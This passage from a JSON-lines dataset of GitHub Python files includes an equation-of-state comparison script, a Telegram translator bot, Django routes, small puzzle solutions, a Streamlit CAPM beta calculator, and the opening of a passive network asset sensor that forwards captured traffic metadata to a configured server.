'\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n\n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ion'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=True)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_qeos_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_qeos_names_dict_inv.keys()]\n\n return op\n\n def ionmix_read(self):\n if self.verbose:\n print('Opening up IONMIX file {}...'.format(self.path_in))\n if self.mpi is None:\n raise Warning('Need mpi for ionmix!')\n else:\n # TODO Add options for man and twot\n op = opp.OpacIonmix(self.path_in, self.mpi, man=True, twot=True)\n self.common_keys = [self.ionmix_names_dict_inv[attr]\n for attr in dir(op)\n if attr in self.ionmix_names_dict_inv.keys()]\n return op\n\nclass get_eos_array(object):\n \"\"\"\n Gets an EoS array based on the input opacplot2 object.\n \"\"\"\n def __init__(self, eos, arr):\n\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Use handle_dict to create the eos_dict based on the input format.\n try:\n self.arr = self.handle_dict[eos.ft](eos, arr)\n # TODO fix this, error handling is not useful since key erros come\n # from everywhere in this class.\n except KeyError:\n raise KeyError('{} is not a valid format name!'.format(eos.ft))\n\n def set_handle_dict(self):\n self.handle_dict = {'propaceos' : self.propaceos,\n 'multi' : self.multi,\n 'sesame' : self.sesame,\n 'sesame-qeos' : self.sesame_qeos,\n 'ionmix' : self.ionmix}\n\n def propaceos(self, eos, arr):\n return eos.data[Formats_Read.propaceos_names_dict[arr]]\n\n def multi(self, eos, arr):\n return eos.data[Formats_Read.multi_names_dict[arr]]\n\n def sesame(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n data_dict = eos.data.data[table_key]\n return data_dict[Formats_Read.sesame_names_dict[arr]]\n\n def sesame_qeos(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n 
data_dict = eos.data.data[table_key]\n        return data_dict[Formats_Read.sesame_qeos_names_dict[arr]]\n\n    def ionmix(self, eos, arr):\n        return getattr(eos.data, Formats_Read.ionmix_names_dict[arr])\n\ndef compare_eos(eos_1, eos_2, verbose=False,\n                plot=False,\n                write_log_file=False,\n                lin_grid=False):\n\n    logfile_name = 'eos_errors.txt'\n\n    # Union of all \"common dictionary format\" keys to do a full error report.\n    # Not including 'idens', 'dens', 'temp', 'groups', 'opp_mg', 'opp_int',\n    # 'opr_int', 'emp_mg', 'opr_mg', 'emp_int', 'Abar','Zmax', 'Ut_DT',\n    # 'Znum', 'BulkMod', 'Xnum', 'Anum', 'Zsymb', 'ElemNum', 'Anum_prp'.\n    # (aka no opacity data currently).\n    # TODO add opacity comparison capabilities.\n    keys = ['Pec_DT', 'Zf_DT', 'Pi_DT', 'Uec_DT', 'Ui_DT']\n\n    shared_keys = [key for key in keys\n                   if key in eos_1.common_keys\n                   and key in eos_2.common_keys]\n\n    if verbose:\n        err_report_str = 'Performing error report on:\\n'\n        for i in range(len(shared_keys)):\n            err_report_str += '{}. {}\\n'.format((i+1), shared_keys[i])\n        print(err_report_str)\n\n    # Perform error report using number densities.\n    error_report = []\n\n    # Freak out if there is no number density.\n    if 'idens' not in eos_1.common_keys or 'idens' not in eos_2.common_keys:\n        raise Warning('No number density data!')\n\n    # Get the temperature and density arrays.\n    dens_1 = get_eos_array(eos_1, 'idens').arr\n    temp_1 = get_eos_array(eos_1, 'temp').arr\n    dens_2 = get_eos_array(eos_2, 'idens').arr\n    temp_2 = get_eos_array(eos_2, 'temp').arr\n\n    # These will be used for the interpolator function `griddata`.\n    d_interp_1, t_interp_1 = np.meshgrid(dens_1, temp_1)\n    d_interp_2, t_interp_2 = np.meshgrid(dens_2, temp_2)\n\n    # Creating a new grid to interpolate onto.\n    d = opp.utils.intersect_1D_sorted_arr(dens_1, dens_2)\n    t = opp.utils.intersect_1D_sorted_arr(temp_1, temp_2)\n    D_new, T_new = np.meshgrid(d,t)\n\n    if (d is None) or (t is None):\n        raise Warning('Density and temperature arrays must have some overlap!')\n    if verbose:\n        print('Density range: {:.5E} to {:.5E} #/cm^3.'.format(d[0], d[-1]))\n        print('Temperature range: {:.5E} to {:.5E} eV.'.format(t[0], t[-1]))\n        print('Generating error report...')\n\n    fn_1 = os.path.split(eos_1.path_in)[1]\n    fn_2 = os.path.split(eos_2.path_in)[1]\n\n    if write_log_file:\n        # Append heading for our current grid.\n        with open(logfile_name, 'a') as f:\n            f.write('Files: {}, {}\\n'.format(fn_1, fn_2))\n            f.write('[Array, RMS Error, Absolute Error]\\n')\n\n    # Do analysis on each of the shared keys.\n    for key in shared_keys:\n        # Get the data.\n        data_1 = get_eos_array(eos_1, key).arr\n        data_2 = get_eos_array(eos_2, key).arr\n\n        # Use interpolation to account for mismatched grid sizes.\n        # `rescale=True` to account for the orders of magnitude difference\n        # in the dens/temp grids.\n        # `scipy.interpolate.interp2d` was not giving accurate interpolation.\n        # I believe this is due to the orders of magnitude difference also,\n        # which `griddata` can easily fix. 
- JT\n # Additionally, `griddata` is much faster than using an interpolator\n # function to fill an empty grid.\n interp_data_1 = sp.interpolate.griddata(\n (d_interp_1.flatten(), t_interp_1.flatten()),\n data_1.T.flatten(),\n (D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n interp_data_2 = sp.interpolate.griddata(\n (d_interp_2.flatten(), t_interp_2.flatten()),\n data_2.T.flatten(),(D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n\n interp_data_1 = interp_data_1.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_2 = interp_data_2.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_1 = interp_data_1.T\n interp_data_2 = interp_data_2.T\n\n err_1_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_1)\n err_2_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_2)\n\n err_1_rms = np.sqrt(err_1_sqr.mean())\n err_2_rms = np.sqrt(err_2_sqr.mean())\n err_rms = max(err_1_rms, err_2_rms)\n\n err_1_abs = np.sqrt(np.max(err_1_sqr))\n err_2_abs = np.sqrt(np.max(err_2_sqr))\n err_abs = max(err_1_abs, err_2_abs)\n\n fmt='%.0f %%'\n if plot:\n titles = {'Zf_DT':'Average Ionization',\n 'Pec_DT':'Electron Pressure',\n 'Pi_DT':'Ion Pressure',\n 'Uec_DT':'Electron Energy',\n 'Ui_DT':'Ion Energy'}\n\n fig, axarr = plt.subplots(1,3)\n x, y = np.meshgrid(d, t)\n res_levels = {0:.1, 1:.01, 2:.0001 }\n fig.set_size_inches(21, 6)\n\n for i in range(3):\n levels = np.linspace(0, res_levels[i], 256)\n cs = axarr[i].contourf(x, y, np.sqrt(err_1_sqr).T,\n levels, extend='max')\n cb = plt.colorbar(cs, ax=axarr[i])\n cb.formatter = matplotlib.ticker.FuncFormatter(lambda x,p: '{:.1e}%'.format(float(x)*100))\n cb.update_ticks()\n if i==2:\n cb.set_label('% Error')\n if not lin_grid:\n axarr[i].loglog()\n axarr[i].set_xlim((d[0], d[-1]))\n axarr[i].set_ylim((t[0], t[-1]))\n axarr[i].set_xlabel('rho [#/cm^(3)]')\n axarr[i].set_ylabel('T [eV]')\n\n fig.tight_layout()\n fig.suptitle('{} % Error for {} vs. 
{}'.format(titles[key], fn_1, fn_2))\n fig.subplots_adjust(top=0.85)\n fig.savefig('{}.png'.format(key+'_err'))\n\n if write_log_file:\n with open(logfile_name, 'a') as f:\n f.write('{}, {}, {}\\n'.format(key, err_rms, err_abs))\n\n print('Error statistics for {}:'.format(key))\n print('RMS % Error: {:.5e}.'.format(err_rms*100))\n print('Max % Absolute Error: {:.5e}.'.format(err_abs*100))\n\ndef check_error():\n input_data = get_input_data()\n\n if input_data['args'].filetypes is None:\n read_format_ext(input_data['args'],\n input_data['fn_1'],\n input_data['fn_2'])\n\n eos_1 = Formats_Read(input_data['args'].filetypes[0],\n input_data['basedir_1'],\n input_data['basename_1'],\n input_data['path_in_1'],\n mpi=input_data['args'].mpi_1,\n znum=input_data['args'].Znum_1,\n xnum=input_data['args'].Xfracs_1,\n filters=input_data['args'].filters_1,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_1)\n\n eos_2 = Formats_Read(input_data['args'].filetypes[1],\n input_data['basedir_2'],\n input_data['basename_2'],\n input_data['path_in_2'],\n mpi=input_data['args'].mpi_2,\n znum=input_data['args'].Znum_2,\n xnum=input_data['args'].Xfracs_2,\n filters=input_data['args'].filters_2,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_2)\n\n compare_eos(eos_1, eos_2, verbose=input_data['args'].verbose,\n plot=input_data['args'].plot,\n write_log_file=input_data['args'].writelog,\n lin_grid=input_data['args'].lin_grid)\n\nif __name__=='__main__':\n check_error()\n","repo_name":"flash-center/opacplot2","sub_path":"opacplot2/scripts/opac_error.py","file_name":"opac_error.py","file_ext":"py","file_size_in_byte":32047,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"}
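compare_eos() above interpolates both EOS tables onto the intersection of their density/temperature axes before taking an RMS relative error. A minimal, self-contained sketch of that interpolate-then-compare step on synthetic data (the grids and the stand-in quantity f are invented here; no opacplot2 is needed):

import numpy as np
from scipy.interpolate import griddata

# Two EOS-like tables sampled on different (density, temperature) grids.
dens_1, temp_1 = np.linspace(1, 10, 40), np.linspace(1, 100, 30)
dens_2, temp_2 = np.linspace(2, 12, 50), np.linspace(5, 120, 35)
f = lambda d, t: d * np.sqrt(t)  # stand-in physical quantity
D1, T1 = np.meshgrid(dens_1, temp_1)
D2, T2 = np.meshgrid(dens_2, temp_2)

# Common grid: the overlap of the two axis ranges.
d = np.linspace(max(dens_1[0], dens_2[0]), min(dens_1[-1], dens_2[-1]), 32)
t = np.linspace(max(temp_1[0], temp_2[0]), min(temp_1[-1], temp_2[-1]), 32)
D_new, T_new = np.meshgrid(d, t)

interp_1 = griddata((D1.ravel(), T1.ravel()), f(D1, T1).ravel(),
                    (D_new, T_new), method='linear', rescale=True)
interp_2 = griddata((D2.ravel(), T2.ravel()), f(D2, T2).ravel(),
                    (D_new, T_new), method='linear', rescale=True)

rel_err = (interp_1 - interp_2) / interp_1
print('RMS % error: {:.3e}'.format(100 * np.sqrt(np.nanmean(rel_err ** 2))))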
+{"seq_id":"46059533428","text":"# Get token of telegram chat bot\nfile = open(\"Telegram_chatbot_token.txt\",\"r\")\nToken = file.read()\n\nCallBot = \"No\"\nAskBot = \"No\"\nBotAsk = \"No\"\nChat_id = None\n\nfrom telegram.ext import Updater,CommandHandler,MessageHandler,Filters\nfrom Translator import translatorAI\n\ndef main():\n # Updater update from telegram and push it to Dispatcher\n updater = Updater(Token)\n\n # Link updater with dispatcher\n dispatcher = updater.dispatcher\n print(\"Bot start\")\n\n # Add command handle vs message handle\n start_handler = CommandHandler(['Ronet','hi'],start)\n translate_handler = CommandHandler('translate',translate)\n Message_handler = MessageHandler(Filters.text,sendMessage)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(translate_handler)\n dispatcher.add_handler(Message_handler)\n\n # Start chatbot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n# Handle start command\ndef start(bot, update):\n update.message.reply_text(\"Hi, I am translator bot !\")\n print(update.message.chat.id)\n\n# Handle command translate\ndef translate(bot,update):\n string=update.message.text[11:]\n update.message.reply_text(\"It may take some minutes ...\")\n update.message.reply_text(\"Translate: \\n\"+translatorAI(string))\n\n# Handler conversation with both \ndef sendMessage(bot,update):\n # Define global var for state of conversation\n global AskBot, CallBot, BotAsk, Chat_id\n\n # put message received onto analyze\n String = update.message.text\n List = String.split(' ')\n\n # Try to make bot deploy on single conversation\n if Chat_id == update.message.chat_id or Chat_id is None:\n\n # state 1: bot ask usr for conversation\n if CallBot == \"No\" and AskBot == \"No\" and BotAsk == \"No\":\n for name in List:\n if name == \"@ronet20190310_bot\":\n Chat_id = update.message.chat_id\n bot.sendMessage(Chat_id,\"Do you call me ?\")\n BotAsk = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 2: usr confirm conversation\n elif BotAsk == \"Yes\" and CallBot == \"No\" and AskBot == \"No\":\n for name in List:\n if name == \"yes\" or name == \"Yes\":\n bot.sendMessage(Chat_id,\"What do you want ?\")\n CallBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 3: usr ask bot for function\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"No\":\n for name in List:\n if name == \"translate\" or name == \"Translate\":\n bot.sendMessage(Chat_id,\"Enter text you want to translate !\")\n AskBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This feature not yet update on me, sorry\\n This conversation close\") \n BotAsk = CallBot = AskBot =\"No\"\n Chat_id = None\n\n # state 4: bot answer usr\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"Yes\":\n bot.sendMessage(Chat_id,\"Please waiting for translation ...\")\n bot.sendMessage(Chat_id,translatorAI(String))\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n else:\n bot.sendMessage(update.message.chat_id,\"Bot is busy now\")\n \n# Main runnning function\nif __name__ == '__main__':\n main()\n","repo_name":"larycoder/chatbots","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
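The sendMessage() handler above walks a four-step dialogue using global 'Yes'/'No' string flags. A library-agnostic sketch of the same flow as an explicit state machine (the State names and the transition table are illustrative, not part of the original bot):

from enum import Enum, auto

class State(Enum):
    IDLE = auto()          # nobody has called the bot yet
    CONFIRMING = auto()    # bot asked 'Do you call me ?'
    AWAITING_CMD = auto()  # bot asked 'What do you want ?'
    TRANSLATING = auto()   # bot asked for the text to translate

def next_state(state, text):
    words = text.lower().split()
    if state is State.IDLE:
        if '@ronet20190310_bot' in words:
            return State.CONFIRMING, 'Do you call me ?'
        return State.IDLE, None
    if state is State.CONFIRMING:
        if 'yes' in words:
            return State.AWAITING_CMD, 'What do you want ?'
        return State.IDLE, 'This conversation close'
    if state is State.AWAITING_CMD:
        if 'translate' in words:
            return State.TRANSLATING, 'Enter text you want to translate !'
        return State.IDLE, 'This conversation close'
    # State.TRANSLATING: the real bot hands `text` to translatorAI() here.
    return State.IDLE, 'Translate: ' + text

state = State.IDLE
for msg in ['hello @ronet20190310_bot', 'yes', 'translate', 'bonjour']:
    state, reply = next_state(state, msg)
    print(state, '->', reply)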
+{"seq_id":"30762178618","text":"from django.urls import path\nfrom ecommerce.views import user_views as views\n\nurlpatterns = [\n # using the custom token view that has custom user data\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('register/', views.registerUser, name=\"register\"),\n path('profile/', views.getUser, name=\"users-profile\"),\n path('profile/update/', views.updateUser, name=\"users-profile-update\"),\n path('', views.getUsers, name=\"users\"),\n\n]","repo_name":"Jacob-Hoff-man/django-ecommerce","sub_path":"django-ecommerce/ecommerce/urls/user_urls.py","file_name":"user_urls.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40749180213","text":"from actions.evaluate import evaluate\n\n\ndef loseLife(game, source, player, amountToLose):\n \"\"\"Set the life total for selected player to (current life - the amount to lose)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life loss\n player (Player): Player that is loosing life\n amountToLose (Int): The amount of life to lose\n\n Returns:\n None\n \"\"\"\n if amountToLose == 0:\n return\n player.lifeTotal -= amountToLose\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef gainLife(game, source, player, amountToGain):\n \"\"\"Set the life total for selected player to (current life + the amount to gain)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life gain\n player (Player): Player that is gaining life\n amountToGain (Int): The amount of life to gain\n\n Returns:\n None\n \"\"\"\n if amountToGain == 0:\n return\n\n player.lifeTotal += amountToGain\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef setLife(game, source, player, newTotal):\n \"\"\"Sets the life total of the selected player to the specified amount\n\n Args:\n game (Game): Game Object\n source (Object): Source that is setting the player's life total\n player (Player): Player is having their life total set\n newTotal (Int): New life total\n\n Returns:\n None\n \"\"\"\n if player.getLife() == newTotal:\n pass\n elif (player.getLife() > newTotal):\n evaluate(game, loseLife, source=source, player=player, amountToLose=(player.getLife() - newTotal))\n else:\n evaluate(game, gainLife, source=source, player=player, amountToGain=(newTotal - player.getLife()))\n","repo_name":"0xBC9/Cardname-Server","sub_path":"engine/actions/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
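setLife() above never writes the total directly; it computes a delta and dispatches to loseLife or gainLife through evaluate(). The routing rule, reduced to a stand-alone sketch (the real Game/Player plumbing is stubbed away):

def route_set_life(current, new_total):
    # Mirrors the three branches of setLife(): no-op, lose, or gain.
    if current == new_total:
        return ('noop', 0)
    if current > new_total:
        return ('loseLife', current - new_total)
    return ('gainLife', new_total - current)

assert route_set_life(20, 15) == ('loseLife', 5)
assert route_set_life(20, 23) == ('gainLife', 3)
assert route_set_life(20, 20) == ('noop', 0)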
+{"seq_id":"71153841325","text":"def plastic_balance(lst):\n    while True:\n        if not lst:\n            return []\n        if len(lst) == 1:\n            # A lone element only balances itself when it is zero.\n            return lst if lst[0] + lst[0] == 0 else []\n        if lst[0] + lst[-1] == sum(lst[1:-1]):\n            return lst\n        # The ends do not balance the middle: trim both and retry.\n        del lst[0]\n        del lst[-1]\n\n\nprint(plastic_balance([0, 104, 3, 101, 0, 111]))","repo_name":"DovydasMen/codewars","sub_path":"plastci_balance.py","file_name":"plastci_balance.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
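Re-summing lst[1:-1] on every pass makes the trim loop quadratic. An equivalent sketch that keeps a running total instead, giving the same results under the kata's rules as implemented above (unlike the original, it leaves the input list unmutated):

def plastic_balance_fast(lst):
    total = sum(lst)
    lo, hi = 0, len(lst) - 1
    while lo < hi:
        ends = lst[lo] + lst[hi]
        if ends == total - ends:  # the two ends balance the middle
            return lst[lo:hi + 1]
        total -= ends             # trim both ends and retry
        lo, hi = lo + 1, hi - 1
    if lo == hi:                  # one element left
        return lst[lo:lo + 1] if lst[lo] + lst[lo] == 0 else []
    return []

print(plastic_balance_fast([0, 104, 3, 101, 0, 111]))  # -> [104, 3, 101, 0]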
+{"seq_id":"37194912727","text":"#BOJ 1978 - Finding prime numbers\n\nimport sys\nimport math\ninput = sys.stdin.readline\n\nT = int(input())\narr = list(map(int, input().split()))\ncnt = 0\n\ndef prime(_n):\n    if _n < 2:\n        return False\n    for i in range(2, int(math.sqrt(_n))+1):\n        if _n % i == 0:\n            return False\n    return True\n\nfor i in range(T):\n    if prime(arr[i]):\n        cnt += 1\n\nprint(cnt)\n","repo_name":"underflow101/BOJ_solve","sub_path":"1978 - 소수 찾기/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
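Trial division up to sqrt(n) is fine for a handful of numbers; for many queries a sieve precomputes primality in one pass. A sketch, assuming the usual bound of 1000 for this problem:

def sieve(n):
    is_prime = [False, False] + [True] * (n - 1)
    for p in range(2, int(n ** 0.5) + 1):
        if is_prime[p]:
            # Strike out every multiple of p starting from p*p.
            is_prime[p * p::p] = [False] * len(is_prime[p * p::p])
    return is_prime

IS_PRIME = sieve(1000)
print(sum(IS_PRIME[v] for v in [1, 3, 5, 7]))  # -> 3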
+{"seq_id":"44330097553","text":"# importing libraries\nimport streamlit as st\nimport datetime\nimport pandas_datareader.data as web\nimport yfinance as yf\nimport pandas as pd\nimport capm_functions\nimport numpy as np\nimport plotly.express as px\n\n# setting page config\nst.set_page_config(\n\n    page_title=\"CAPM\",\n    page_icon=\"chart_with_upwards_trend\",\n    layout=\"wide\",\n    )\n\nst.title('Calculate Beta and Return for individual stock')\n\n# getting input from user\ncol1, col2 = st.columns([1,1])\nwith col1:\n    stock = st.selectbox(\"Choose a stock\" , ('TSLA', 'AAPL','NFLX','MGM','MSFT','AMZN','NVDA','GOOGL'))\nwith col2:\n    year = st.number_input(\"Number of Years\",1,10)\n\n# downloading data for SP500\nend = datetime.date.today()\nstart = datetime.date(datetime.date.today().year - year, datetime.date.today().month, datetime.date.today().day)\nSP500 = web.DataReader(['sp500'], 'fred', start, end)\n\n# downloading data for the stock\nstocks_df = yf.download(stock, period = f'{year}y')\nstocks_df = stocks_df[['Close']]\nstocks_df.columns = [f'{stock}']\nstocks_df.reset_index(inplace = True)\nSP500.reset_index(inplace = True)\nSP500.columns = ['Date','sp500']\nstocks_df['Date'] = stocks_df['Date'].astype('datetime64[ns]')\nstocks_df['Date'] = stocks_df['Date'].apply(lambda x:str(x)[:10])\nstocks_df['Date'] = pd.to_datetime(stocks_df['Date'])\nstocks_df = pd.merge(stocks_df, SP500, on = 'Date', how = 'inner')\n\n# calculating daily return \nstocks_daily_return = capm_functions.daily_return(stocks_df)\n\n# calculate beta and alpha\nbeta, alpha = capm_functions.calculate_beta(stocks_daily_return, stock)\n\n# risk free rate of return\nrf = 0\n\n# market portfolio return (annualized from daily returns)\nrm = stocks_daily_return['sp500'].mean()*252\n\n# calculate return\nreturn_value = round(rf+(beta*(rm-rf)),2)\n\n# showing results\nst.markdown(f'### Beta : {beta}')\nst.markdown(f'### Return : {return_value}')\nfig = px.scatter(stocks_daily_return, x = 'sp500', y = stock, title = stock)\nfig.add_scatter(x = stocks_daily_return['sp500'], y = beta*stocks_daily_return['sp500'] + alpha, line=dict(color=\"crimson\"))\nst.plotly_chart(fig, use_container_width=True)","repo_name":"mdaamir6870/Capital-Asset-Pricing-Model","sub_path":"pages/Calculate_Beta.py","file_name":"Calculate_Beta.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
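capm_functions is not included in this record; a common way its calculate_beta could work is an ordinary least-squares fit of the stock's daily returns against the market's (an illustrative sketch, not necessarily the module's actual implementation):

import numpy as np

def beta_alpha(stock_returns, market_returns):
    # The slope of the best-fit line is beta (Cov(r_s, r_m) / Var(r_m));
    # the intercept is alpha. np.polyfit returns both in one call.
    beta, alpha = np.polyfit(market_returns, stock_returns, deg=1)
    return beta, alpha

rm_daily = np.array([0.010, -0.020, 0.005, 0.030, -0.007])
rs_daily = 1.3 * rm_daily + 0.001
print(beta_alpha(rs_daily, rm_daily))  # ~ (1.3, 0.001)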
+{"seq_id":"3404031271","text":"#-*- coding:utf-8 -*-\n\nfrom lib._http_tcp_shark import tcp_http_shark\nfrom lib._http_tcp_pcap import tcp_http_pcap\nfrom lib._util import check_lock\nfrom lib._util import _syslog_msg_send, _http_msg_send, _tcp_msg_send\nimport getopt\nimport sys\nimport os\nimport threading\n# import queue\nimport collections\nimport signal\nimport traceback\nimport time\n\n# 数据接收服务器地址和端口信息\nserver_ip = '127.0.0.1'\nserver_port = 514\n# 监听网卡\ninterface = 'eth0'\n# 主机标识\ncustom_tag = '127.0.0.1'\n# bpf_filter\nbpf_filter = 'tcp'\n# display_filter\ndisplay_filter = 'tcp'\n# debug模式,数据console输出\ndebug = False\n# chunked/gzip数据分析,对性能压力较大\nreturn_deep_info = False\n# 重复缓存数量\ncache_size = 4096\n# 流量会话数量\nsession_size = 4096\n# tshark定期清空内存(单位秒/默认一小时),pcap接收数据包的超时时间(单位毫秒/默认3.6秒)\ntimeout = 3600\n# 发送数据线程数量\nmsg_send_thread_num = 2\n# 发送数据队列最大值\nmax_queue_size = 50000\n# 资产数据发送模式,仅支持TCP,HTTP,SYSLOG三种\nmsg_send_mode = 'TCP'\n# 流量采集引擎,仅支持TSHARK,PCAP两种\nengine = \"PCAP\"\n# pcap采集数据类型控制,TCP,HTTP\npcap_collection_data = 'TCP/HTTP'\n\n# HTTP数据过滤\nhttp_filter = {\n\t\"response_code\": ['304', '400', '404'],\n\t\"content_type\": [\n\t\t'audio/',\n\t\t'video/',\n\t\t'image/',\n\t\t'font/',\n\t\t'application/pdf',\n\t\t'application/msword',\n\t\t'application/javascript',\n\t\t'text/javascript',\n\t\t'text/css'\n\t]\n}\n\ndef Usage():\n\tprint('''\n ###################################################################\n # passets-sensor 1.0.0 #\n ###################################################################\n -------------------------------------------------------------------\n Usage:\n python3 main.py [options] ...\n\n -i Name or idx of interface(def: None)\t\t \n -s server ip(def: None)\n -p server port(def: None)\n -t Source identification(def: localhost)\n -c Cache size(def: 1024)\n -S Session size(def: 1024)\n -T Memory clear time(def: 3600 sec)\n -d Debug information switch(def: off)\n -------------------------------------------------------------------\n\t''')\n\tsys.exit()\n\ndef tshark_analysis(work_queue):\n\n\tshark_obj = tcp_http_shark(work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tshark_obj.run()\n\ndef pcap_analysis(work_queue):\n\tpcap_obj = tcp_http_pcap(pcap_collection_data, int(max_queue_size), work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tpcap_obj.run()\n\nclass thread_msg_send(threading.Thread):\n\tdef __init__(self, work_queue, msg_send_mode):\n\n\t\tthreading.Thread.__init__(self)\n\t\tself.work_queue = work_queue\n\t\tself.msg_send_mode = msg_send_mode\n\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\n\tdef msg_obj_fun(self, msg_send_mode):\n\t\tif msg_send_mode == \"TCP\":\n\t\t\tmsg_obj = _tcp_msg_send(server_ip,server_port)\n\t\telif msg_send_mode == \"HTTP\":\n\t\t\thttp_url = \"http://{}:{}/\".format(server_ip,server_port)\n\t\t\tmsg_obj = _http_msg_send(http_url)\n\t\telif msg_send_mode == \"SYSLOG\":\n\t\t\tmsg_obj = _syslog_msg_send(server_ip,server_port)\n\t\telse:\n\t\t\tmsg_obj = ''\n\t\treturn msg_obj\n\n\tdef run(self):\n\t\ttcp_flag = True if self.msg_obj else False\n\t\t# total_msg_num = 0\n\t\twhile True:\n\t\t\t# start = time.time()\n\t\t\tif not tcp_flag:\n\t\t\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\t\t\tif len(self.work_queue):\n\t\t\t\tresult = self.work_queue.popleft()\n\t\t\t\tif msg_send_mode == \"TCP\":\n\t\t\t\t\ttcp_flag = 
self.msg_obj.info(result)\n\t\t\t\t\t# total_msg_num += 1\n\t\t\t\t\t# if total_msg_num%100 == 0:\n\t\t\t\t\t\t# end = time.time()\n\t\t\t\t\t\t# print(\"Used Time: %s\"%(end - start))\n\t\t\t\telse:\n\t\t\t\t\tself.msg_obj.info(result)\n\n\t\nif __name__ == '__main__':\n\n\t# 宿主机crontab方式启动\n\t# */5 * * * * root /usr/bin/python3 /passets-sensor/main.py >> /dev/null 2>&1\n\t# check_lock()\n\n\ttry:\n\t\topts,args = getopt.getopt(sys.argv[1:],'i: s: p: d: t: r: c: T: S:')\n\texcept:\n\t\tUsage()\n\tif len(opts) < 3:\n\t\tUsage()\n\n\tfor o, a in opts:\n\t\tif o == \"-i\":\n\t\t\tinterface = str(a)\n\t\tif o == '-s':\n\t\t\tserver_ip = str(a)\n\t\tif o == '-t':\n\t\t\tcustom_tag = str(a)\n\t\tif o == '-p': \n\t\t\tserver_port = int(a)\n\t\tif o == '-d':\n\t\t\tdebug_str = str(a)\n\t\t\tif debug_str == 'on':\n\t\t\t\tdebug = True\n\t\tif o == '-r':\n\t\t\treturn_switch_str = str(a)\n\t\t\tif return_switch_str == 'on':\n\t\t\t\treturn_deep_info = True\n\t\t\telse:\n\t\t\t\treturn_deep_info = False\n\t\tif o == '-c':\n\t\t\tcache_size = int(a)\n\t\tif o == '-S':\n\t\t\tsession_size = 